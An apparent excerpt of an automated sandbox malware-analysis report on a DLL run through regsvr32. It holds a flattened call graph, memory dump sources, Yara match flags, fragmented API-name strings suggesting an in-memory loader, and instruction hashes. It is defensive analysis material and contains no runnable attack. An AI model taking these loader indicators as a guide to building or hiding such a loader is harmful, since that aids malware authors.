16551->16552 16555 7fef9d2d67c _calloc_dbg_impl 16551->16555 16554 7fef9d2bd70 _invalid_parameter 17 API calls 16552->16554 16553->16539 
16554->16553 16555->16553 16556 7fef9d2bd70 _invalid_parameter 17 API calls 16555->16556 16556->16553 16558 7fef9d28010 16557->16558 16559 7fef9d2800e 16557->16559 16560 7fef9d2be00 _invoke_watson_if_oneof 16 API calls 16558->16560 16559->16539 16560->16559 16562 7fef9d29c2a 16561->16562 16571 7fef9d29b10 16562->16571 16564 7fef9d29c34 16575 7fef9d29f20 16564->16575 16566 7fef9d29c51 16568 7fef9d29ecd 16566->16568 16581 7fef9d2a000 16566->16581 16568->16546 16569 7fef9d29ce8 16569->16568 16594 7fef9d29360 LeaveCriticalSection 16569->16594 16572 7fef9d29b19 16571->16572 16574 7fef9d29bde 16572->16574 16595 7fef9d29360 LeaveCriticalSection 16572->16595 16574->16564 16576 7fef9d29f49 16575->16576 16577 7fef9d29f81 16576->16577 16578 7fef9d29f5b GetOEMCP 16576->16578 16579 7fef9d29f88 GetACP 16577->16579 16580 7fef9d29f79 _CrtMemDumpAllObjectsSince _LocaleUpdate::~_LocaleUpdate 16577->16580 16578->16580 16579->16580 16580->16566 16582 7fef9d29f20 __initmbctable 2 API calls 16581->16582 16583 7fef9d2a028 16582->16583 16584 7fef9d2a234 16583->16584 16589 7fef9d2a039 __initmbctable 16583->16589 16590 7fef9d2a08e __initmbctable 16583->16590 16586 7fef9d2a25d IsValidCodePage 16584->16586 16584->16589 16585 7fef9d23280 _CrtMemDumpAllObjectsSince_stat 8 API calls 16587 7fef9d2a470 16585->16587 16588 7fef9d2a27b GetCPInfo 16586->16588 16586->16589 16587->16569 16588->16589 16592 7fef9d2a295 __initmbctable 16588->16592 16589->16585 16596 7fef9d2a5e0 GetCPInfo 16590->16596 16593 7fef9d2a5e0 __initmbctable 19 API calls 16592->16593 16593->16589 16594->16568 16595->16574 16600 7fef9d2a61f 16596->16600 16605 7fef9d2a7dc 16596->16605 16597 7fef9d23280 _CrtMemDumpAllObjectsSince_stat 8 API calls 16598 7fef9d2aa30 16597->16598 16598->16589 16599 7fef9d2f4d0 _CrtMemDumpAllObjectsSince_stat 3 API calls 16601 7fef9d2a734 16599->16601 16600->16599 16607 7fef9d2ef00 16601->16607 16603 7fef9d2a788 16604 7fef9d2ef00 __initmbctable 7 API calls 16603->16604 16604->16605 16605->16597 16606 
7fef9d2a80a 16605->16606 16606->16589 16608 7fef9d2ef2c _CrtMemDumpAllObjectsSince 16607->16608 16611 7fef9d2efb0 16608->16611 16610 7fef9d2ef8e _LocaleUpdate::~_LocaleUpdate 16610->16603 16612 7fef9d2efd4 __initmbctable 16611->16612 16613 7fef9d2f068 MultiByteToWideChar 16612->16613 16614 7fef9d2f0a5 _CrtMemDumpAllObjectsSince_stat 16613->16614 16619 7fef9d2f0ac malloc _MarkAllocaS 16613->16619 16614->16610 16615 7fef9d2f122 MultiByteToWideChar 16615->16614 16616 7fef9d2f164 LCMapStringW 16615->16616 16616->16614 16617 7fef9d2f1a8 16616->16617 16618 7fef9d2f1b8 16617->16618 16625 7fef9d2f222 malloc _MarkAllocaS 16617->16625 16618->16614 16620 7fef9d2f1d9 LCMapStringW 16618->16620 16619->16614 16619->16615 16620->16614 16621 7fef9d2f2ac LCMapStringW 16621->16614 16622 7fef9d2f2ea 16621->16622 16623 7fef9d2f341 WideCharToMultiByte 16622->16623 16624 7fef9d2f2f4 WideCharToMultiByte 16622->16624 16623->16614 16624->16614 16625->16614 16625->16621 18462 7fef9d312e3 LoadLibraryW 18463 7fef9d31304 GetProcAddress 18462->18463 18464 7fef9d312fd 18462->18464 18463->18464 18465 7fef9d3132a 7 API calls 18463->18465 18468 7fef9d23280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18464->18468 18466 7fef9d313b3 GetProcAddress EncodePointer 18465->18466 18467 7fef9d313d5 18465->18467 18466->18467 18470 7fef9d313f9 DecodePointer DecodePointer 18467->18470 18472 7fef9d31428 DecodePointer 18467->18472 18469 7fef9d3157a 18468->18469 18470->18472 18472->18464 18477 7fef9d344e5 18478 7fef9d3445a __SehTransFilter 18477->18478 18482 7fef9d3466c __SehTransFilter 18478->18482 18484 7fef9d35180 __SehTransFilter 38 API calls 18478->18484 18479 7fef9d347d7 18480 7fef9d3485b 18479->18480 18481 7fef9d2cf80 _inconsistency 36 API calls 18479->18481 18481->18480 18482->18479 18483 7fef9d35bb0 __SehTransFilter 36 API calls 18482->18483 18485 7fef9d34727 18483->18485 18484->18478 18485->18479 18486 7fef9d2e500 __GetUnwindTryBlock 37 API calls 18485->18486 18487 7fef9d34767 18486->18487 18488 
7fef9d2edc0 __SehTransFilter 9 API calls 18487->18488 18488->18479 17501 7fef9d3bfde 17511 7fef9d3c00c 17501->17511 17502 7fef9d3b99c 17503 7fef9d3cc93 17502->17503 17508 7fef9d3bada 17502->17508 17505 7fef9d2bd70 _invalid_parameter 17 API calls 17503->17505 17506 7fef9d3bb0e _LocaleUpdate::~_LocaleUpdate 17503->17506 17504 7fef9d3b530 wctomb_s 19 API calls 17504->17511 17505->17506 17507 7fef9d23280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17506->17507 17509 7fef9d3cd90 17507->17509 17510 7fef9d2bd70 _invalid_parameter 17 API calls 17508->17510 17510->17506 17511->17502 17511->17504 17512 7fef9d35de0 17517 7fef9d23170 17512->17517 17514 7fef9d35e86 17518 7fef9d231ac 17517->17518 17519 7fef9d23280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17518->17519 17520 7fef9d23263 17519->17520 17520->17514 17521 7fef9d23870 17520->17521 17522 7fef9d239db __SehTransFilter 17521->17522 17524 7fef9d238de __SehTransFilter 17521->17524 17522->17514 17523 7fef9d23a71 RtlUnwindEx 17523->17522 17524->17522 17524->17523 17525 7fef9d3ade0 17530 7fef9d3fee0 17525->17530 17528 7fef9d3adf9 17540 7fef9d3ff00 17530->17540 17532 7fef9d3ade9 17532->17528 17533 7fef9d3fc70 17532->17533 17539 7fef9d3fc86 17533->17539 17534 7fef9d3fd59 17607 7fef9d29360 LeaveCriticalSection 17534->17607 17536 7fef9d3fd63 17536->17528 17537 7fef9d3fd09 DeleteCriticalSection 17537->17539 17539->17534 17539->17537 17596 7fef9d40580 17539->17596 17541 7fef9d3ff22 17540->17541 17542 7fef9d40042 17541->17542 17543 7fef9d3ff47 17541->17543 17573 7fef9d29360 LeaveCriticalSection 17542->17573 17544 7fef9d4003d 17543->17544 17555 7fef9d3ae90 17543->17555 17544->17532 17546 7fef9d4004c 17546->17532 17548 7fef9d3ff97 17549 7fef9d3ffd0 17548->17549 17551 7fef9d3ffe1 17548->17551 17552 7fef9d3ffbb 17548->17552 17568 7fef9d3af60 17549->17568 17551->17549 17554 7fef9d3fd70 _fflush_nolock 25 API calls 17551->17554 17558 7fef9d3fd70 17552->17558 17554->17549 17556 7fef9d3aec8 EnterCriticalSection 17555->17556 17557 
7fef9d3aea4 17555->17557 17556->17557 17557->17548 17559 7fef9d3fd81 17558->17559 17560 7fef9d3fd8a 17558->17560 17561 7fef9d3ff00 _fflush_nolock 25 API calls 17559->17561 17574 7fef9d3fdf0 17560->17574 17563 7fef9d3fd88 17561->17563 17563->17549 17564 7fef9d3fd94 17564->17563 17565 7fef9d3afb0 _fflush_nolock 17 API calls 17564->17565 17566 7fef9d3fdba 17565->17566 17578 7fef9d407c0 17566->17578 17569 7fef9d3af74 17568->17569 17570 7fef9d3af98 LeaveCriticalSection 17568->17570 17595 7fef9d29360 LeaveCriticalSection 17569->17595 17572 7fef9d3af96 17570->17572 17572->17544 17573->17546 17575 7fef9d3fe1f 17574->17575 17577 7fef9d3fe5d 17574->17577 17576 7fef9d3afb0 _fflush_nolock 17 API calls 17575->17576 17575->17577 17576->17577 17577->17564 17579 7fef9d407d3 17578->17579 17581 7fef9d407e8 17578->17581 17579->17563 17580 7fef9d40851 17582 7fef9d2bd70 _invalid_parameter 17 API calls 17580->17582 17581->17580 17587 7fef9d4088f 17581->17587 17582->17579 17583 7fef9d40913 17588 7fef9d2bd70 _invalid_parameter 17 API calls 17583->17588 17584 7fef9d40951 17585 7fef9d3fae0 _fflush_nolock 3 API calls 17584->17585 17586 7fef9d4095a 17585->17586 17589 7fef9d3f900 _fflush_nolock 17 API calls 17586->17589 17592 7fef9d409ab __doserrno 17586->17592 17587->17583 17587->17584 17588->17579 17590 7fef9d40992 FlushFileBuffers 17589->17590 17591 7fef9d4099f GetLastError 17590->17591 17590->17592 17591->17592 17594 7fef9d3fbc0 LeaveCriticalSection 17592->17594 17594->17579 17595->17572 17597 7fef9d40599 17596->17597 17598 7fef9d405ef 17597->17598 17599 7fef9d4062a 17597->17599 17601 7fef9d2bd70 _invalid_parameter 17 API calls 17598->17601 17603 7fef9d40623 17599->17603 17608 7fef9d3ae10 17599->17608 17601->17603 17602 7fef9d40651 17612 7fef9d40680 17602->17612 17603->17539 17605 7fef9d4065c 17623 7fef9d3aee0 17605->17623 17607->17536 17609 7fef9d3ae77 EnterCriticalSection 17608->17609 17610 7fef9d3ae27 17608->17610 17611 7fef9d3ae3b 17609->17611 17610->17609 17610->17611 17611->17602 

                                    Control-flow Graph

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: AllocAllocateExitFreeHeapLibraryLoadMessageProcessTaskVirtual
                                    • String ID: :Pt$aZ.$!k}$"<t$"BQa$#sa{$$cb($$v"P$)*E$*p$+80Z$+sui$,'a$,kb($-~5$1+t$1>#J$1D4v$3/Q$4cg$9cnt$:-ZZ$?#$@kb($A+M$CwT>$GBQ+$N tW$N7#6$Pv5=$QS}5$Qp_*$Qv5$Qv}N$VqQS$[`$]=5[$^ir$_>zT$_>zT$a%"^$aQTH$b('x$b(/N$bkg2$c(kA$eMh$g(%"$gWQ>tTQv5MVM6qQS<jb(kAk%aQTGeMhH)59cj$hH)}$iAk%$kj$k%$b$k%a^$kW]>$o(fA$oRP$pNR`$pw ~$p0$q.$$t+)s$t/p$uTQ2$u'($werfault.exe$xT]v$}LhH$L`$@+*$L1&$S<j$aEy$w5M$|Oi$hH
                                    • API String ID: 2181984824-2091011546
                                    • Opcode ID: 1c06ffdaf7f78c717c8658d928c07ebd4f6ae3fbc6f84201f2b376329c5d69d0
                                    • Instruction ID: bb29df52505e4adc914c7d7009f7ad667354b97652f73d457c5e5bdb89db6ee0
                                    • Opcode Fuzzy Hash: 1c06ffdaf7f78c717c8658d928c07ebd4f6ae3fbc6f84201f2b376329c5d69d0
                                    • Instruction Fuzzy Hash: 3FE2C8B250A7C18FE3748F66AE847DD3AA1F341748F609208C3991FA1DCB7A5255CF86
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917322468.00000000002C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_2c0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Virtual$Alloc$InfoNativeProtectSystem
                                    • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                    • API String ID: 2313188843-2517549848
                                    • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                    • Instruction ID: 8ba112336fca9ef7a8b35a4b59e0e013f0f36789ae3b83468f658d617256cfb9
                                    • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                    • Instruction Fuzzy Hash: 1A72C630628B49CBDB29DF18C885BB9B7E1FB98305F10472DE88AD7211DB34D956CB85
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: -~$!X$"98$5%dv$RXrB$}k=$t$t
                                    • API String ID: 0-2601355769
                                    • Opcode ID: 1ffe31184e489043dfc0ad9b25877cc2ca41a6506ccf0b542c306d1cb23fc7eb
                                    • Instruction ID: 40fa059977533c12daa4c197ac7ec32be5dd4a9ad21ad0dd792eee812670dda9
                                    • Opcode Fuzzy Hash: 1ffe31184e489043dfc0ad9b25877cc2ca41a6506ccf0b542c306d1cb23fc7eb
                                    • Instruction Fuzzy Hash: 4E32F4B1A0578C8BCBB9CF68C8997DD7BF0FB48318F90521DEA099B251CB745A45CB18
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: :j$UI$UI$/$5$@u
                                    • API String ID: 0-1744832406
                                    • Opcode ID: d5fbd5fb42e64105118402a22ae1fd0938665267daf4f484be707b3cdea1b60d
                                    • Instruction ID: 62cabd7460019d857fad8ef6802a9940dae2da1dd4c69d60ad9891f806a9e916
                                    • Opcode Fuzzy Hash: d5fbd5fb42e64105118402a22ae1fd0938665267daf4f484be707b3cdea1b60d
                                    • Instruction Fuzzy Hash: 35421971A1470EDFCB58DFA8C49A6EEBBF2FB44348F008159E806A7250DB719619CB85
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: F:^-$[9S$zUP$?'3$yc
                                    • API String ID: 0-3875576172
                                    • Opcode ID: 149e3d3d365d4ff99a41c49fe7a0ea6fd866fcc9ad2b25dafda07a3e1acf3aff
                                    • Instruction ID: acf5a29543b44a4ac2cab22a28fc6f208f1c2d96f0abb29e90a070f971d4b191
                                    • Opcode Fuzzy Hash: 149e3d3d365d4ff99a41c49fe7a0ea6fd866fcc9ad2b25dafda07a3e1acf3aff
                                    • Instruction Fuzzy Hash: 13720C7050038E8FDF49DF24C88A6DE3BA1FB68388F114619FC56962A1C7B4DA65CBC5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: !$>]$>]$vM/${Wo
                                    • API String ID: 0-1672528178
                                    • Opcode ID: 3476f63b1fd483a3e4edb66e4c1250727eb216b571a6250b7c7aa87006e10f17
                                    • Instruction ID: 47ac1da3a1e26fe678bf2a9ce2069fe56df1d0f6d245f307fc2b30da9b08538d
                                    • Opcode Fuzzy Hash: 3476f63b1fd483a3e4edb66e4c1250727eb216b571a6250b7c7aa87006e10f17
                                    • Instruction Fuzzy Hash: 5C81197051464CABDBE9DF28C8C9BDD3BA0FB58394F906119FD02862A0DB74D9C5CB81
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: %DcZ$L\`$u%$vr
                                    • API String ID: 0-873403245
                                    • Opcode ID: 2030f1da5196c9f476bb93962b4ebdec29646a183379a03d07fdefea4280d3e9
                                    • Instruction ID: 7a4330a3d3912fed14e69a2d18b4041e28774fe6b527757d4cbe653c4a95fa98
                                    • Opcode Fuzzy Hash: 2030f1da5196c9f476bb93962b4ebdec29646a183379a03d07fdefea4280d3e9
                                    • Instruction Fuzzy Hash: 0912F47152068CDFCB8CDF28C88AADD7BA1FB48398F956219FD0A97250D774D984CB84
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: .mZ$\$~V6k$%T
                                    • API String ID: 0-3287852823
                                    • Opcode ID: ccbc70a1b43ffc6d5414b274ff0ecbed60153be03e3051f192a6aa15e06d1cac
                                    • Instruction ID: 166b9a2b8c7d7ea13ff64321e1c32e26f96a2e299ccb60065a18498a6503f561
                                    • Opcode Fuzzy Hash: ccbc70a1b43ffc6d5414b274ff0ecbed60153be03e3051f192a6aa15e06d1cac
                                    • Instruction Fuzzy Hash: 0402E8711013C8CBEBBECFA4D885BD97BA9FB44B44F10661AE84AAE250CBB45745CB41
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    APIs
                                    • HeapCreate.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,000007FEF9D233C2), ref: 000007FEF9D28876
                                    • GetVersion.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000007FEF9D233C2), ref: 000007FEF9D28891
                                    • HeapSetInformation.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000007FEF9D233C2), ref: 000007FEF9D288BB
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Heap$CreateInformationVersion
                                    • String ID:
                                    • API String ID: 3563531100-0
                                    • Opcode ID: 48cf33cfee9be34a63005782b3e03b00dcbae59413766f72d2946869900c76f4
                                    • Instruction ID: 9235811b63a60011062a1442a231d54292fe2d432e51c42db702af6c27d11e97
                                    • Opcode Fuzzy Hash: 48cf33cfee9be34a63005782b3e03b00dcbae59413766f72d2946869900c76f4
                                    • Instruction Fuzzy Hash: 50F0FE74A18A4282F7949729AC0977E63D0B758345FA1C43696CD826B4DF3F9589C601
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 078$GDo$}
                                    • API String ID: 0-303245572
                                    • Opcode ID: 8956c442c33fd1cde17bd2344d54593dce01cac8c777ad426ea07fe8eec3f5fb
                                    • Instruction ID: 0c94e6823936b68487d3afc04f5daf4118d9ac6b30c0afcc694cd4a40111a1d0
                                    • Opcode Fuzzy Hash: 8956c442c33fd1cde17bd2344d54593dce01cac8c777ad426ea07fe8eec3f5fb
                                    • Instruction Fuzzy Hash: 32D1CAB051A784AFC398DF28C1CA94BBBE0FB84754F906A1DF88686260D7B0D945CF42
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: e@-0$f $wC
                                    • API String ID: 0-2741453468
                                    • Opcode ID: 6e670c046987691f0a1e9af823784eece018238e228c51a72b7d39087d84c909
                                    • Instruction ID: f8f9b13c1cb793f3116966172e7ed192e0f5529545d7cab8ca7c6d0d9d04acad
                                    • Opcode Fuzzy Hash: 6e670c046987691f0a1e9af823784eece018238e228c51a72b7d39087d84c909
                                    • Instruction Fuzzy Hash: E2319571518B848FD3A8DF28C48975ABBE1FB84344F608A1DE6DACB260DB709549CF42
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: L=`$rKS(
                                    • API String ID: 0-4157335196
                                    • Opcode ID: 0ffd1ea2413f9b71380f5aeaf5e19bad7dcec336af59defbaf39c2d3ae1cfae5
                                    • Instruction ID: c6b4aee86e77721e5ec6a37c1ce5251b52915c7d30808e23b45806a77bf6ffc0
                                    • Opcode Fuzzy Hash: 0ffd1ea2413f9b71380f5aeaf5e19bad7dcec336af59defbaf39c2d3ae1cfae5
                                    • Instruction Fuzzy Hash: FD51BC705183848FC769DF29C18A64BBBF1FBC6784F108A1DE69A86261D772D909CF43
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 8h
                                    • API String ID: 0-2787117397
                                    • Opcode ID: d20b5c2dabe29708a31ba0e8275e2e5ac6bcf12f9e6970397621dbc27d768f27
                                    • Instruction ID: eb392778bd881193a348804f8d52045fa41d3382a0d9eae0dd8f361f159f4541
                                    • Opcode Fuzzy Hash: d20b5c2dabe29708a31ba0e8275e2e5ac6bcf12f9e6970397621dbc27d768f27
                                    • Instruction Fuzzy Hash: 28D12E7060578C8FEBBADF24CC997DE3BA0FB49744F504219D88A8E260CB745B49CB42
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _calloc_dbg$InfoStartup_calloc_dbg_impl
                                    • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\ioinit.c
                                    • API String ID: 1930727954-3864165772
                                    • Opcode ID: ad15c381301d28b8263a0ad4c3d04fd02eedca4ba797fff4e6a56cbc154e2c0b
                                    • Instruction ID: 04d5086f9a303f60624db38f474b136a55c048ce8eacbf8a5fedaf0ba48a359d
                                    • Opcode Fuzzy Hash: ad15c381301d28b8263a0ad4c3d04fd02eedca4ba797fff4e6a56cbc154e2c0b
                                    • Instruction Fuzzy Hash: DDF1D82260DBC5C9E7B08B19E88076EB7A0F385B64F258226CAED477E4DB3DD445CB11
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _calloc_dbg$__initmbctable_invalid_parameter_invoke_watson_if_error
                                    • String ID: _setenvp$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\stdenvp.c$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\stdenvp.c$strcpy_s(*env, cchars, p)$~
                                    • API String ID: 1648969265-681193798
                                    • Opcode ID: 1267f019c7e433370f87e7d76307e13ae481beb469170db0d9b2813ec215c0ca
                                    • Instruction ID: dee10c55842e2b838f4c2249843f6d7af4c066fce2f7611d1afded1b25fdeaa1
                                    • Opcode Fuzzy Hash: 1267f019c7e433370f87e7d76307e13ae481beb469170db0d9b2813ec215c0ca
                                    • Instruction Fuzzy Hash: D0514F31A1CA8682EB90CB19E88576E77E0F385794F704126EACE477B4DB7EE4408B51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Pointer$Decode$_initterm$EncodeExitProcess__crt
                                    • String ID:
                                    • API String ID: 3799933513-0
                                    • Opcode ID: c9a1689ff4177d35e5a558f0089bed0cb41f7669401f9128f576ef3edf69137f
                                    • Instruction ID: 37cfb5e84e154ae2fbcc5f75e30e47dd1cf7b4373ba061ec72f9a9691eeac49a
                                    • Opcode Fuzzy Hash: c9a1689ff4177d35e5a558f0089bed0cb41f7669401f9128f576ef3edf69137f
                                    • Instruction Fuzzy Hash: 36511C3291DB4281E6A09B58EC8436EB7E0F386794F315125EACD427B9DF7EE544CB01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                    • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\a_env.c
                                    • API String ID: 1823725401-2473407871
                                    • Opcode ID: 2fea13ac07d8f022f3d86b1cc1b99bf950f7c5081f441752a002fe175989ec87
                                    • Instruction ID: ccbee8cdd8044984a813dbfd6c9bb6ca90d3427a1697cce954f0caea4fdd0345
